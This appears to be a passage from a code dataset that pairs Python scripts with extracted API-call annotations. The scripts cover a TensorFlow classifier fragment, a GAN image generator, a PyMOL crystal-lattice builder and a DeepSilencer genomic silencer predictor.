tf\n'), ((3359, 3379), 'tensorflow.argmax', 'tf.argmax', (['y_test', '(1)'], {}), '(y_test, 1)\n', (3368, 3379), True, 'import tensorflow as tf\n'), ((3498, 3542), 'tensorflow.cast', 'tf.cast', (['correct_prediction_test', 'tf.float32'], {}), '(correct_prediction_test, tf.float32)\n', (3505, 3542), True, 'import tensorflow as tf\n'), ((409, 419), 'tensorflow.Graph', 'tf.Graph', ([], {}), '()\n', (417, 419), True, 'import tensorflow as tf\n'), ((1700, 1722), 'tensorflow.cast', 'tf.cast', (['x', 'tf.float32'], {}), '(x, tf.float32)\n', (1707, 1722), True, 'import tensorflow as tf\n'), ((1859, 1907), 'tensorflow.summary.histogram', 'tf.summary.histogram', (['variable.op.name', 'variable'], {}), '(variable.op.name, variable)\n', (1879, 1907), True, 'import tensorflow as tf\n'), ((4405, 4453), 'tensorflow.get_collection', 'tf.get_collection', (['tf.GraphKeys.GLOBAL_VARIABLES'], {}), '(tf.GraphKeys.GLOBAL_VARIABLES)\n', (4422, 4453), True, 
'import tensorflow as tf\n'), ((4763, 4804), 'numpy.reshape', 'np.reshape', (['test_batch_x', '(-1, 28, 28, 1)'], {}), '(test_batch_x, (-1, 28, 28, 1))\n', (4773, 4804), True, 'import numpy as np\n')] |
import torch
import numpy as np
import os
import argparse
from PIL import Image
from tools import display_images_in_folder
parser = argparse.ArgumentParser('Generated Anime Faces')
parser.add_argument('--num_images', type=int, default=64, help='number of generated images')
args = parser.parse_args()
if __name__ == "__main__":
generated_image_folder = './result'
os.makedirs(generated_image_folder, exist_ok=True)
G = torch.load('./model/Generator.pt')
num_images = args.num_images
fixed_z = torch.from_numpy(np.random.uniform(-1, 1, size=(num_images, 100))).float()
if torch.cuda.is_available():
fixed_z = fixed_z.cuda()
G.cuda()
images = G(fixed_z)
images = images.to('cpu').detach().numpy().copy()
images = np.transpose(images, (0, 2, 3, 1))
images = (images * 255).astype(np.uint8)
for idx, image in enumerate(images):
file_name = os.path.join(generated_image_folder, '{}.jpg'.format(idx + 1))
Image.fromarray(image).save(file_name)
display_images_in_folder(generated_image_folder, os.path.join(generated_image_folder, 'combined.jpg'))
| [
"numpy.random.uniform",
"os.makedirs",
"argparse.ArgumentParser",
"torch.load",
"numpy.transpose",
"torch.cuda.is_available",
"PIL.Image.fromarray",
"os.path.join"
] | [((133, 181), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (['"""Generated Anime Faces"""'], {}), "('Generated Anime Faces')\n", (156, 181), False, 'import argparse\n'), ((374, 424), 'os.makedirs', 'os.makedirs', (['generated_image_folder'], {'exist_ok': '(True)'}), '(generated_image_folder, exist_ok=True)\n', (385, 424), False, 'import os\n'), ((433, 467), 'torch.load', 'torch.load', (['"""./model/Generator.pt"""'], {}), "('./model/Generator.pt')\n", (443, 467), False, 'import torch\n'), ((598, 623), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (621, 623), False, 'import torch\n'), ((766, 800), 'numpy.transpose', 'np.transpose', (['images', '(0, 2, 3, 1)'], {}), '(images, (0, 2, 3, 1))\n', (778, 800), True, 'import numpy as np\n'), ((1071, 1123), 'os.path.join', 'os.path.join', (['generated_image_folder', '"""combined.jpg"""'], {}), "(generated_image_folder, 'combined.jpg')\n", (1083, 1123), False, 'import os\n'), ((533, 581), 'numpy.random.uniform', 'np.random.uniform', (['(-1)', '(1)'], {'size': '(num_images, 100)'}), '(-1, 1, size=(num_images, 100))\n', (550, 581), True, 'import numpy as np\n'), ((979, 1001), 'PIL.Image.fromarray', 'Image.fromarray', (['image'], {}), '(image)\n', (994, 1001), False, 'from PIL import Image\n')] |
#!/usr/bin/env python
import argparse
import numpy as np
from scipy.spatial import distance
import string
import __main__
import xtalmd
from xtalmd.utils import cellbasis
parser = argparse.ArgumentParser(description="Generate crystal lattices by using some reference crystal lattice.\
Written by <NAME>, <NAME>, <EMAIL>")
parser.add_argument('--input', '-i', type=str,\
help='Input PDB file',\
required=True,\
nargs='+')
parser.add_argument('--reference', '-r', type=str,\
help='Reference PDB file. Used for construction of crystal lattice',\
required=True)
parser.add_argument('--lattice_factors_x', '-lx',type=int,\
help='Repeat unit cell in x direction from a to b',\
default=[-1,1],\
nargs=2)
parser.add_argument('--lattice_factors_y', '-ly',type=int,\
help='Repeat unit cell in y direction from a to b',\
default=[-1,1],\
nargs=2)
parser.add_argument('--lattice_factors_z', '-lz',type=int,\
help='Repeat unit cell in z direction from a to b',\
default=[-1,1],\
nargs=2)
parser.add_argument('--duplicate_cutoff', '-dc',type=float,\
help='If any atom between any two molecules are closer than this, one of them molecules be removed.',\
default=1e-5,\
nargs=1)
parser.add_argument('--output', '-o', type=str,\
help='Output filename',\
default='lattice.pdb')
parser.add_argument('--verbose', '-v', type=int,\
help='Verbosity mode',\
default=0)
def symexpcell(
prefix='mate',
pymol_object=None,
reference=None,
duplicate_cutoff=1e-5,
a=0,
b=0,
c=0):
'''
DESCRIPTION
Adapted from supercell.py: https://pymolwiki.org/index.php/Supercell
Creates all symmetry-related objects for the specified object that
occur with their bounding box center within the unit cell.
USAGE
symexpcell prefix, object, [a, b, c]
ARGUMENTS
prefix = string: prefix of new objects
pymol_object = string: pymol object for which to create symmetry mates
a, b, c = integer: create neighboring cell {default: 0,0,0}
SEE ALSO
symexp, http://www.pymolwiki.org/index.php/SuperSym
'''
if pymol_object == None:
pymol_object = pymol.cmd.get_object_list()[0]
if reference == None:
reference = pymol_object
sym = pymol.cmd.get_symmetry(reference)
cell_edges = sym[0:3]
cell_angles = sym[3:6]
spacegroup = sym[6]
basis = cellbasis(cell_angles, cell_edges)
basis = np.matrix(basis)
extent = pymol.cmd.get_extent(reference)
center = sum(np.array(extent)) * 0.5
center = np.matrix(center.tolist() + [1.0]).T
center_cell = basis.I * center
extra_shift = [[float(i)] for i in (a,b,c)]
matrices = pymol.xray.sg_sym_to_mat_list(spacegroup)
global_names = pymol.cmd.get_object_list("global")
N_global = len(global_names)
N_matrices = len(matrices)
crds_list_mates = np.zeros(
(N_matrices,
pymol.cmd.count_atoms(pymol_object),
3
)
)
crds_list_global = np.zeros(
(N_global,
pymol.cmd.count_atoms(pymol_object),
3
)
)
for mat_i in range(N_matrices):
mat = np.matrix(matrices[mat_i])
shift = np.floor(mat * center_cell)
mat[0:3,3] -= shift[0:3,0]
mat[0:3,3] += extra_shift
mat = basis * mat * basis.I
mat_list = list(mat.flat)
name = '%s%d' % (prefix, mat_i)
pymol.cmd.create(name, pymol_object)
pymol.cmd.transform_object(name, mat_list, 0)
crds_list_mates[mat_i] = pymol.cmd.get_coords(name, 1)
for global_i in range(N_global):
crds_list_global[global_i] = pymol.cmd.get_coords(global_names[global_i], 1)
excluded_objects = []
for mat_i in range(N_matrices):
if mat_i in excluded_objects:
continue
### Compute distance between molecule generated through
### matrix `mat_i` and all other molecules
for j in range(N_matrices):
if mat_i == j:
continue
dists_mates = distance.cdist(
crds_list_mates[j],
crds_list_mates[mat_i],
)
too_close_list_mates = np.where(dists_mates < duplicate_cutoff)[0]
if too_close_list_mates.size > 0:
excluded_objects.append(j)
for j in range(N_global):
dists_global = distance.cdist(
crds_list_global[j],
crds_list_mates[mat_i],
)
too_close_list_global = np.where(dists_global < duplicate_cutoff)[0]
if too_close_list_global.size > 0:
excluded_objects.append(mat_i)
break
unique_objects = list()
for mat_i in range(N_matrices):
if not mat_i in excluded_objects:
unique_objects.append('%s%d' % (prefix, mat_i))
else:
pymol.cmd.delete('%s%d' % (prefix, mat_i))
return unique_objects
if __name__ == "__main__":
args = parser.parse_args()
verbose = False
if args.verbose > 0:
verbose = True
if verbose:
__main__.pymol_argv = ['pymol','-qc'] # Pymol: quiet and no GUI
else:
__main__.pymol_argv = ['pymol','-qQc'] # Pymol: quiet and no GUI
import pymol
pymol.finish_launching()
pymol.cmd.set("pdb_conect_all", "on")
pymol.cmd.set("connect_mode", "1")
pymol.cmd.set("retain_order", "1")
pymol.cmd.set('pdb_use_ter_records', 1)
pymol.cmd.group("global")
pymol.cmd.load(args.reference, "reference")
object_count = 0
uc_count = 0
for input_idx, input in enumerate(args.input):
if verbose:
print("Loading %s..." %input)
pymol.cmd.load(input, "input")
### Build the P1 cell
p1_object_list = symexpcell(
"p1_cell",
"input",
"reference",
args.duplicate_cutoff,
0,
0,
0)
crds_list = list()
N_p1_obj = len(p1_object_list)
remove_atoms = list()
for object_name in p1_object_list:
crds_list.append(pymol.cmd.get_coords(object_name, 1))
crds_list = np.array(crds_list)
for object_idx_1 in range(N_p1_obj):
for object_idx_2 in range(N_p1_obj):
p1_dists = distance.cdist(
crds_list[object_idx_1],
crds_list[object_idx_2]
)
valids_1, valids_2 = np.where(p1_dists < args.duplicate_cutoff)
for i in range(valids_1.size):
if valids_1[i] == valids_2[i]:
continue
valids1_str = f"{p1_object_list[object_idx_1]} and rank {valids_1[i]:d}"
valids2_str = f"{p1_object_list[object_idx_2]} and rank {valids_2[i]:d}"
if not valids2_str in remove_atoms:
if not valids1_str in remove_atoms:
remove_atoms.append(valids1_str)
for ra in remove_atoms:
pymol.cmd.remove(ra)
create_list = list()
for object_name in p1_object_list:
if pymol.cmd.count_atoms(object_name) == 0:
pymol.cmd.delete(object_name)
else:
create_list.append(object_name)
pymol.cmd.create("input_p1", " or ".join(create_list))
for object_name in create_list:
pymol.cmd.delete(object_name)
a, b, c, alpha, beta, gamma, spacegroup = pymol.cmd.get_symmetry("input")
pymol.cmd.set_symmetry(
"input_p1",
a,
b,
c,
alpha,
beta,
gamma,
"P1")
pymol.cmd.delete(f"input")
for a in range(args.lattice_factors_x[0],args.lattice_factors_x[1]+1):
for b in range(args.lattice_factors_y[0],args.lattice_factors_y[1]+1):
for c in range(args.lattice_factors_z[0],args.lattice_factors_z[1]+1):
if verbose:
print("Generating unit cell",a,b,c)
object_list = symexpcell(
"i_",
"input_p1",
"input_p1",
args.duplicate_cutoff,
a,
b,
c)
for i in range(len(object_list)):
chain = string.ascii_uppercase[i]
chain = string.ascii_uppercase[i]
pymol.cmd.copy("mol%d" %object_count, object_list[i])
pymol.cmd.alter("mol%d" %object_count, 'chain="%s"' %chain)
pymol.cmd.group("global", "mol%d" %object_count)
if verbose:
pymol.cmd.save("mol%d_%d%d%d_%d_" %(input_idx,a,b,c,i) + args.output, "mol%d" %object_count)
pymol.cmd.delete(object_list[i])
object_count += 1
uc_count += 1
pymol.cmd.delete("input_p1")
pymol.cmd.save(args.output, "global")
| [
"argparse.ArgumentParser",
"pymol.cmd.copy",
"pymol.cmd.remove",
"numpy.floor",
"pymol.cmd.save",
"pymol.cmd.get_object_list",
"pymol.finish_launching",
"pymol.cmd.transform_object",
"pymol.cmd.delete",
"pymol.cmd.get_extent",
"scipy.spatial.distance.cdist",
"pymol.cmd.alter",
"pymol.cmd.cre... | [((182, 377), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Generate crystal lattices by using some reference crystal lattice. Written by <NAME>, <NAME>, <EMAIL>"""'}), "(description=\n 'Generate crystal lattices by using some reference crystal lattice. Written by <NAME>, <NAME>, <EMAIL>'\n )\n", (205, 377), False, 'import argparse\n'), ((3305, 3338), 'pymol.cmd.get_symmetry', 'pymol.cmd.get_symmetry', (['reference'], {}), '(reference)\n', (3327, 3338), False, 'import pymol\n'), ((3431, 3465), 'xtalmd.utils.cellbasis', 'cellbasis', (['cell_angles', 'cell_edges'], {}), '(cell_angles, cell_edges)\n', (3440, 3465), False, 'from xtalmd.utils import cellbasis\n'), ((3478, 3494), 'numpy.matrix', 'np.matrix', (['basis'], {}), '(basis)\n', (3487, 3494), True, 'import numpy as np\n'), ((3509, 3540), 'pymol.cmd.get_extent', 'pymol.cmd.get_extent', (['reference'], {}), '(reference)\n', (3529, 3540), False, 'import pymol\n'), ((3736, 3777), 'pymol.xray.sg_sym_to_mat_list', 'pymol.xray.sg_sym_to_mat_list', (['spacegroup'], {}), '(spacegroup)\n', (3765, 3777), False, 'import pymol\n'), ((3797, 3832), 'pymol.cmd.get_object_list', 'pymol.cmd.get_object_list', (['"""global"""'], {}), "('global')\n", (3822, 3832), False, 'import pymol\n'), ((6363, 6387), 'pymol.finish_launching', 'pymol.finish_launching', ([], {}), '()\n', (6385, 6387), False, 'import pymol\n'), ((6393, 6430), 'pymol.cmd.set', 'pymol.cmd.set', (['"""pdb_conect_all"""', '"""on"""'], {}), "('pdb_conect_all', 'on')\n", (6406, 6430), False, 'import pymol\n'), ((6435, 6469), 'pymol.cmd.set', 'pymol.cmd.set', (['"""connect_mode"""', '"""1"""'], {}), "('connect_mode', '1')\n", (6448, 6469), False, 'import pymol\n'), ((6474, 6508), 'pymol.cmd.set', 'pymol.cmd.set', (['"""retain_order"""', '"""1"""'], {}), "('retain_order', '1')\n", (6487, 6508), False, 'import pymol\n'), ((6513, 6552), 'pymol.cmd.set', 'pymol.cmd.set', (['"""pdb_use_ter_records"""', '(1)'], {}), 
"('pdb_use_ter_records', 1)\n", (6526, 6552), False, 'import pymol\n'), ((6557, 6582), 'pymol.cmd.group', 'pymol.cmd.group', (['"""global"""'], {}), "('global')\n", (6572, 6582), False, 'import pymol\n'), ((6588, 6631), 'pymol.cmd.load', 'pymol.cmd.load', (['args.reference', '"""reference"""'], {}), "(args.reference, 'reference')\n", (6602, 6631), False, 'import pymol\n'), ((10220, 10257), 'pymol.cmd.save', 'pymol.cmd.save', (['args.output', '"""global"""'], {}), "(args.output, 'global')\n", (10234, 10257), False, 'import pymol\n'), ((4216, 4242), 'numpy.matrix', 'np.matrix', (['matrices[mat_i]'], {}), '(matrices[mat_i])\n', (4225, 4242), True, 'import numpy as np\n'), ((4259, 4286), 'numpy.floor', 'np.floor', (['(mat * center_cell)'], {}), '(mat * center_cell)\n', (4267, 4286), True, 'import numpy as np\n'), ((4476, 4512), 'pymol.cmd.create', 'pymol.cmd.create', (['name', 'pymol_object'], {}), '(name, pymol_object)\n', (4492, 4512), False, 'import pymol\n'), ((4521, 4566), 'pymol.cmd.transform_object', 'pymol.cmd.transform_object', (['name', 'mat_list', '(0)'], {}), '(name, mat_list, 0)\n', (4547, 4566), False, 'import pymol\n'), ((4600, 4629), 'pymol.cmd.get_coords', 'pymol.cmd.get_coords', (['name', '(1)'], {}), '(name, 1)\n', (4620, 4629), False, 'import pymol\n'), ((4705, 4752), 'pymol.cmd.get_coords', 'pymol.cmd.get_coords', (['global_names[global_i]', '(1)'], {}), '(global_names[global_i], 1)\n', (4725, 4752), False, 'import pymol\n'), ((6796, 6826), 'pymol.cmd.load', 'pymol.cmd.load', (['input', '"""input"""'], {}), "(input, 'input')\n", (6810, 6826), False, 'import pymol\n'), ((7279, 7298), 'numpy.array', 'np.array', (['crds_list'], {}), '(crds_list)\n', (7287, 7298), True, 'import numpy as np\n'), ((8621, 8652), 'pymol.cmd.get_symmetry', 'pymol.cmd.get_symmetry', (['"""input"""'], {}), "('input')\n", (8643, 8652), False, 'import pymol\n'), ((8661, 8730), 'pymol.cmd.set_symmetry', 'pymol.cmd.set_symmetry', (['"""input_p1"""', 'a', 'b', 'c', 'alpha', 
'beta', 'gamma', '"""P1"""'], {}), "('input_p1', a, b, c, alpha, beta, gamma, 'P1')\n", (8683, 8730), False, 'import pymol\n'), ((8837, 8863), 'pymol.cmd.delete', 'pymol.cmd.delete', (['f"""input"""'], {}), "(f'input')\n", (8853, 8863), False, 'import pymol\n'), ((10186, 10214), 'pymol.cmd.delete', 'pymol.cmd.delete', (['"""input_p1"""'], {}), "('input_p1')\n", (10202, 10214), False, 'import pymol\n'), ((3204, 3231), 'pymol.cmd.get_object_list', 'pymol.cmd.get_object_list', ([], {}), '()\n', (3229, 3231), False, 'import pymol\n'), ((3558, 3574), 'numpy.array', 'np.array', (['extent'], {}), '(extent)\n', (3566, 3574), True, 'import numpy as np\n'), ((3965, 4000), 'pymol.cmd.count_atoms', 'pymol.cmd.count_atoms', (['pymol_object'], {}), '(pymol_object)\n', (3986, 4000), False, 'import pymol\n'), ((4095, 4130), 'pymol.cmd.count_atoms', 'pymol.cmd.count_atoms', (['pymol_object'], {}), '(pymol_object)\n', (4116, 4130), False, 'import pymol\n'), ((5104, 5162), 'scipy.spatial.distance.cdist', 'distance.cdist', (['crds_list_mates[j]', 'crds_list_mates[mat_i]'], {}), '(crds_list_mates[j], crds_list_mates[mat_i])\n', (5118, 5162), False, 'from scipy.spatial import distance\n'), ((5456, 5515), 'scipy.spatial.distance.cdist', 'distance.cdist', (['crds_list_global[j]', 'crds_list_mates[mat_i]'], {}), '(crds_list_global[j], crds_list_mates[mat_i])\n', (5470, 5515), False, 'from scipy.spatial import distance\n'), ((5969, 6011), 'pymol.cmd.delete', 'pymol.cmd.delete', (["('%s%d' % (prefix, mat_i))"], {}), "('%s%d' % (prefix, mat_i))\n", (5985, 6011), False, 'import pymol\n'), ((8165, 8185), 'pymol.cmd.remove', 'pymol.cmd.remove', (['ra'], {}), '(ra)\n', (8181, 8185), False, 'import pymol\n'), ((8541, 8570), 'pymol.cmd.delete', 'pymol.cmd.delete', (['object_name'], {}), '(object_name)\n', (8557, 8570), False, 'import pymol\n'), ((5262, 5302), 'numpy.where', 'np.where', (['(dists_mates < duplicate_cutoff)'], {}), '(dists_mates < duplicate_cutoff)\n', (5270, 5302), True, 'import 
numpy as np\n'), ((5615, 5656), 'numpy.where', 'np.where', (['(dists_global < duplicate_cutoff)'], {}), '(dists_global < duplicate_cutoff)\n', (5623, 5656), True, 'import numpy as np\n'), ((7221, 7257), 'pymol.cmd.get_coords', 'pymol.cmd.get_coords', (['object_name', '(1)'], {}), '(object_name, 1)\n', (7241, 7257), False, 'import pymol\n'), ((7420, 7484), 'scipy.spatial.distance.cdist', 'distance.cdist', (['crds_list[object_idx_1]', 'crds_list[object_idx_2]'], {}), '(crds_list[object_idx_1], crds_list[object_idx_2])\n', (7434, 7484), False, 'from scipy.spatial import distance\n'), ((7584, 7626), 'numpy.where', 'np.where', (['(p1_dists < args.duplicate_cutoff)'], {}), '(p1_dists < args.duplicate_cutoff)\n', (7592, 7626), True, 'import numpy as np\n'), ((8273, 8307), 'pymol.cmd.count_atoms', 'pymol.cmd.count_atoms', (['object_name'], {}), '(object_name)\n', (8294, 8307), False, 'import pymol\n'), ((8330, 8359), 'pymol.cmd.delete', 'pymol.cmd.delete', (['object_name'], {}), '(object_name)\n', (8346, 8359), False, 'import pymol\n'), ((9677, 9731), 'pymol.cmd.copy', 'pymol.cmd.copy', (["('mol%d' % object_count)", 'object_list[i]'], {}), "('mol%d' % object_count, object_list[i])\n", (9691, 9731), False, 'import pymol\n'), ((9755, 9816), 'pymol.cmd.alter', 'pymol.cmd.alter', (["('mol%d' % object_count)", '(\'chain="%s"\' % chain)'], {}), '(\'mol%d\' % object_count, \'chain="%s"\' % chain)\n', (9770, 9816), False, 'import pymol\n'), ((9839, 9888), 'pymol.cmd.group', 'pymol.cmd.group', (['"""global"""', "('mol%d' % object_count)"], {}), "('global', 'mol%d' % object_count)\n", (9854, 9888), False, 'import pymol\n'), ((10069, 10101), 'pymol.cmd.delete', 'pymol.cmd.delete', (['object_list[i]'], {}), '(object_list[i])\n', (10085, 10101), False, 'import pymol\n'), ((9952, 10055), 'pymol.cmd.save', 'pymol.cmd.save', (["('mol%d_%d%d%d_%d_' % (input_idx, a, b, c, i) + args.output)", "('mol%d' % object_count)"], {}), "('mol%d_%d%d%d_%d_' % (input_idx, a, b, c, i) + args.output, \n 
'mol%d' % object_count)\n", (9966, 10055), False, 'import pymol\n')] |
import tensorflow as tf
import os
import keras.backend as K
import hickle as hkl
import numpy as np
import argparse
from DeepSilencer import DeepSilencer
from sklearn.utils import shuffle
from Loading_data import seq_to_kspec,checkseq,chunks,loadindex,load_genome,num2acgt,acgt2num,seq2mat,encoding_matrix
from openpyxl import load_workbook
if __name__ == '__main__':
    # Command-line driver: slide a 200 bp window over each candidate region,
    # score every window with a trained DeepSilencer model, average the window
    # scores per region, and write predicted silencers as a BED-like table
    # annotated with cell-line metadata from an Excel mapping file.
    parser = argparse.ArgumentParser(description='DeepSilencer: Newly developed deep learning model to predict silencers')
    parser.add_argument('--data', '-d', type=str, help='input test data name',default='m_mm19_ENCODE')
    parser.add_argument('--outdir', '-o', type=str, default=os.path.dirname(os.getcwd())+'/output/crossdata-projection-mouse/', help='Output path')
    parser.add_argument('--model_name', '-f', type=str, default='./model/kmer_seq.h5', help='Model name to load for prediction')
    parser.add_argument('--mapping_file','-m',type=str,default='Mouse_mapping.xlsx',help='Mapping the cell lines we predict to their real names')
    parser.add_argument('--seed', type=int, default=1234, help='Random seed for repeat results')
    # NOTE(review): type=bool is an argparse pitfall -- any non-empty string
    # (including "False") parses as True; only the default value is reliable.
    parser.add_argument('--save_result','-p', type = bool, default = True, help='Save test labels and predicted labels')
    parser.add_argument('--genome','-ge', type = str, default = 'mm10', help='The genome we need to predict')
    parser.add_argument('--start_position','-sta', type = int, default = 0, help='Start position in the data to predict')
    parser.add_argument('--end_position','-end', type = int, default = 0, help='End position in the data to predict. If set to 0, it will predict the entire test set')
    args = parser.parse_args()
    modelname = args.model_name
    sequences = load_genome(args.genome)  # chromosome key -> sequence
    indexes_encode = loadindex(sequences,name = args.data)  # candidate regions to score
    data_name = args.data
    start_position = args.start_position
    end_position = args.end_position
    outdir = args.outdir
    mapping = args.mapping_file
    # load model
    deepsilencer = DeepSilencer()
    deepsilencer.load_weights(modelname)
    pred_result = []  # one averaged score per region
    # predict the probability
    if end_position == 0 and start_position == 0:
        end_position = len(indexes_encode)
    for i in range(start_position,end_position):
        temp_sequence = indexes_encode[i]
        silencers = list()  # [sampleid, chrkey, start, end] for every window
        index = temp_sequence
        target_length = 200  # fixed model input length in bp
        stride = 1
        # The sliding window
        # NOTE(review): bare except -- entries may have 4 or 5 fields; any
        # other unpacking error is silently retried with the 4-field form.
        try:
            [sampleid, chrkey, startpos, endpos, _] = index
        except:
            [sampleid, chrkey, startpos, endpos] = index
        origin_length = endpos - startpos
        if origin_length < target_length:
            # Region shorter than one window: slide the window leftwards so
            # that every placement still covers the whole region.
            silencer_start = startpos - target_length + origin_length
            silencer_end = endpos + target_length -origin_length
            for shift in range(0, target_length - origin_length, stride):
                start = startpos - shift
                end = start + target_length
                seq, legal = checkseq(chrkey, start, end,sequences)
                if legal:
                    silencers.append([sampleid, chrkey, start, end])
        elif origin_length >= target_length:
            # Region at least one window long: tile it with overlapping
            # chunks (overlap = target_length - stride).
            silencer_start = startpos + target_length - origin_length
            silencer_end = endpos - target_length + origin_length
            chunks_ = chunks(range(startpos, endpos), target_length, target_length - stride)
            for chunk in chunks_:
                start = chunk[0]
                end = chunk[-1] + 1
                if (end - start) == target_length:
                    seq, legal = checkseq(chrkey, start, end,sequences)
                    silencers.append([sampleid, chrkey, start, end])
                elif (end - start) < target_length:
                    break
        num = len(silencers)
        # One-hot sequence input: (num windows, 4 bases, 200 bp, 1 channel).
        silencer_mat = np.vstack([seq2mat(sequences[item[1]][item[2]:item[3]]) for item \
                                   in silencers])
        silencer_mat = silencer_mat.astype(int)
        silencer_mat = silencer_mat.reshape(-1,4,200,1)
        silencer_seq = sequences[chrkey][silencer_start+1:silencer_end+1]
        test_data_kmer = []
        # NOTE(review): K = 5 shadows the 'keras.backend as K' import for the
        # rest of this script -- here it is the k-mer length.
        K = 5
        # k-mer spectrum of an end window, then updated incrementally for each
        # shifted window: subtract the k-mer leaving the window, add the one
        # entering it, instead of recounting the full spectrum.
        seq = silencer_seq[-201:-1]
        kmer_whole = seq_to_kspec(seq,K=K)
        kmer_whole = np.array(kmer_whole).reshape(4**K)
        kmer = np.copy(kmer_whole)
        test_data_kmer.append(kmer)
        for ind in range(num-1):
            kmer = np.copy(kmer)
            sub_seq = silencer_seq[-ind-K-1:-ind-1]
            index = 0
            # Base-4 encode the k-mer to get its index in the spectrum.
            for j in range(K):
                index += encoding_matrix[sub_seq[j]]*(4**(K-j-1))
            kmer[index] = kmer[index] - 1
            add_seq = silencer_seq[-ind-202:-ind-202+K]
            index = 0
            for j in range(K):
                index += encoding_matrix[add_seq[j]]*(4**(K-j-1))
            kmer[index] = kmer[index]+1
            test_data_kmer.append(kmer)
        # take the average of n results
        test_data_kmer = np.array(test_data_kmer).reshape(-1,4**K)
        pred_label = deepsilencer.predict(silencer_mat, test_data_kmer)
        pred_result.append(sum(pred_label)/num)
    # Read the cell-type -> (cell line, tissue, organ) mapping spreadsheet.
    workbook = load_workbook(mapping)
    booksheet = workbook.active
    # obtain row data in sheet
    rows = booksheet.rows
    # obtain column data in sheet
    columns = booksheet.columns
    i = 1
    # Iterate over all the rows
    cell_type = []
    cell_line = []
    tissue = []
    organ = []
    # NOTE(review): i starts at 1 and is incremented before the first read, so
    # row 1 (presumably a header) is skipped and one row past the last is
    # read (openpyxl returns None there) -- verify against the sheet layout.
    for row in rows:
        i = i + 1
        line = [col.value for col in row]
        cell_data_1 = booksheet.cell(row=i, column=1).value
        cell_data_2 = booksheet.cell(row=i, column=2).value
        cell_data_3 = booksheet.cell(row=i, column=3).value
        cell_data_4 = booksheet.cell(row=i, column=4).value
        cell_type.append(cell_data_1)
        cell_line.append(cell_data_2)
        tissue.append(cell_data_3)
        organ.append(cell_data_4)
    type2line = {cell_type[i]:cell_line[i] for i in range(len(cell_type))}
    type2tissue = {cell_type[i]:tissue[i] for i in range(len(cell_type))}
    type2organ = {cell_type[i]:organ[i] for i in range(len(cell_type))}
    threshold = 0.5  # mean window score above this => call it a silencer
    name_test = '%s_%d_%d_%.2f.txt'%(data_name,start_position,end_position,threshold)
    head = np.array([['Chrom','Start','End','Strand','Size','Method','Cell line','Tissue','Species'\
                      ,'Genome','Organ','Reference','Pubmed']])
    table = []
    # to predict whether it is silencer
    # NOTE(review): indexes_encode[i][4] assumes a 5-field entry; the 4-field
    # entries tolerated above would raise IndexError here -- verify.
    for i in range(start_position,end_position):
        if pred_result[i-start_position] > threshold:
            if indexes_encode[i][4] in type2line.keys():
                table.append([indexes_encode[i][1],indexes_encode[i][2]+1,indexes_encode[i][3]+1,\
                '.',-int(indexes_encode[i][2])+int(indexes_encode[i][3]), 'DeepSilencer',type2line[indexes_encode[i][4]],\
                type2tissue[indexes_encode[i][4]],'Mus musculus',args.genome,\
                type2organ[indexes_encode[i][4]],'.','.'])
    table = np.array(table)
    table = np.append(head,table,axis = 0)
    # save result
    if args.save_result:
        if not os.path.exists(outdir):
            os.makedirs(outdir)
        np.savetxt(outdir + name_test,table,delimiter="\t",fmt = '%s') | [
"argparse.ArgumentParser",
"numpy.copy",
"os.makedirs",
"Loading_data.checkseq",
"os.getcwd",
"numpy.savetxt",
"os.path.exists",
"openpyxl.load_workbook",
"Loading_data.loadindex",
"numpy.append",
"Loading_data.seq_to_kspec",
"numpy.array",
"Loading_data.load_genome",
"Loading_data.seq2mat... | [((381, 495), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""DeepSilencer: Newly developed deep learning model to predict silencers"""'}), "(description=\n 'DeepSilencer: Newly developed deep learning model to predict silencers')\n", (404, 495), False, 'import argparse\n'), ((1720, 1744), 'Loading_data.load_genome', 'load_genome', (['args.genome'], {}), '(args.genome)\n', (1731, 1744), False, 'from Loading_data import seq_to_kspec, checkseq, chunks, loadindex, load_genome, num2acgt, acgt2num, seq2mat, encoding_matrix\n'), ((1766, 1802), 'Loading_data.loadindex', 'loadindex', (['sequences'], {'name': 'args.data'}), '(sequences, name=args.data)\n', (1775, 1802), False, 'from Loading_data import seq_to_kspec, checkseq, chunks, loadindex, load_genome, num2acgt, acgt2num, seq2mat, encoding_matrix\n'), ((2002, 2016), 'DeepSilencer.DeepSilencer', 'DeepSilencer', ([], {}), '()\n', (2014, 2016), False, 'from DeepSilencer import DeepSilencer\n'), ((5134, 5156), 'openpyxl.load_workbook', 'load_workbook', (['mapping'], {}), '(mapping)\n', (5147, 5156), False, 'from openpyxl import load_workbook\n'), ((6314, 6459), 'numpy.array', 'np.array', (["[['Chrom', 'Start', 'End', 'Strand', 'Size', 'Method', 'Cell line',\n 'Tissue', 'Species', 'Genome', 'Organ', 'Reference', 'Pubmed']]"], {}), "([['Chrom', 'Start', 'End', 'Strand', 'Size', 'Method', 'Cell line',\n 'Tissue', 'Species', 'Genome', 'Organ', 'Reference', 'Pubmed']])\n", (6322, 6459), True, 'import numpy as np\n'), ((7093, 7108), 'numpy.array', 'np.array', (['table'], {}), '(table)\n', (7101, 7108), True, 'import numpy as np\n'), ((7121, 7151), 'numpy.append', 'np.append', (['head', 'table'], {'axis': '(0)'}), '(head, table, axis=0)\n', (7130, 7151), True, 'import numpy as np\n'), ((4204, 4226), 'Loading_data.seq_to_kspec', 'seq_to_kspec', (['seq'], {'K': 'K'}), '(seq, K=K)\n', (4216, 4226), False, 'from Loading_data import seq_to_kspec, checkseq, chunks, loadindex, 
